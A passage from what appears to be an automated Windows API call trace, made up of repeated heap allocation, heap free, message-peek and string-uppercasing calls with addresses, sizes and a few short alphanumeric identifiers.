hHeap=0x2af0000) returned 1 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0220.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0220.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0220.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0220.824] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0220.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0220.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0220.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0220.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0220.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0220.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0220.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0220.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0220.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0220.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0220.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0220.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0220.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0220.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0220.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0220.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0220.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0220.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0220.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0220.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0220.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0220.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0220.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0220.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0220.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0220.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.826] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0220.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0220.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0220.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0220.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0220.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.827] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0220.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0220.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0220.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0220.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.827] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0220.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0220.827] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0220.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0220.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab548 [0220.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0220.828] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0220.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0220.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0220.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0220.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0220.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0220.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0220.828] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0220.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0220.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0220.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0220.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0220.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0220.828] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0220.828] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0220.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0220.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0220.829] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0220.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab800 [0220.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a747d8 [0220.829] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0220.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0220.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0220.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0220.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0220.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0220.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0220.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0220.829] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0220.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0220.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0220.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0220.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0220.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0220.830] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0220.830] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0220.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0220.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0220.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0220.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0220.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0220.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0220.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0220.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0220.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a747d8 | out: hHeap=0x2af0000) returned 1 [0220.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0220.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0220.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0220.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0220.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0220.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0220.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0220.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0220.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0220.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0220.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0220.831] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0220.831] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0220.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0220.831] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0220.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0220.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0220.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab818 [0220.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74508 [0220.831] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0220.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0220.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0220.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0220.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0220.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0220.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0220.832] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0220.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0220.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0220.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0220.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 